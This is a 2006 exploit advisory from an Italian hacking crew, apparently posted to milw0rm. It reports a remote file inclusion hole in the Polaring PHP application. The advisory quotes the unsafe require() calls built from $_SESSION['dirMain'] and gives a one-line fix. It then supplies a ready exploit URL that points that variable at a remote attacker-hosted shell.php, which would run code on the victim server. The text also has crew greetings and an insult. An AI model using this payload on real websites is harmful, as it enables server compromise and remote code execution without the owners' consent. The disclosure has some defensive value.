###### ToXiC ######################### # #Polaring Remote File Include # #BuG FounD by Drago84 # #Application Affect: Polaring Remote File Include #Source Code: #http://sourceforge.net/project/showfiles.php?group_id=150989&package_id=166837&release_id=444225 #Problem: #require($_SESSION['dirMain'].'/view/css.php'); #require($_SESSION['dirMain'].'/view/frontpage.php'); #require($_SESSION['dirMain'].'/view/navigation.php'); #require($_SESSION['dirMain'].'/view/gmaps.php'); #require($_SESSION['dirMain'].'/view/errorReport.php'); #Solution : Declare $_SESSION['dirMain'] #Page Vulnerable : general.php #Dir : /view/ # Exempe Of ExPloit is: #http://www.site.com/polaring_dir/view/general.php?_SESSION['dirMain']=http://marcusbestlamer.gay/shell.php? #GrEatZ All Member of ToXiC, Str0ke # Fuck Sonic Il chan italiano + merdoso che esista # ToXic Security Italian CreW ###### ToXiC ################### # milw0rm.com [2006-09-25]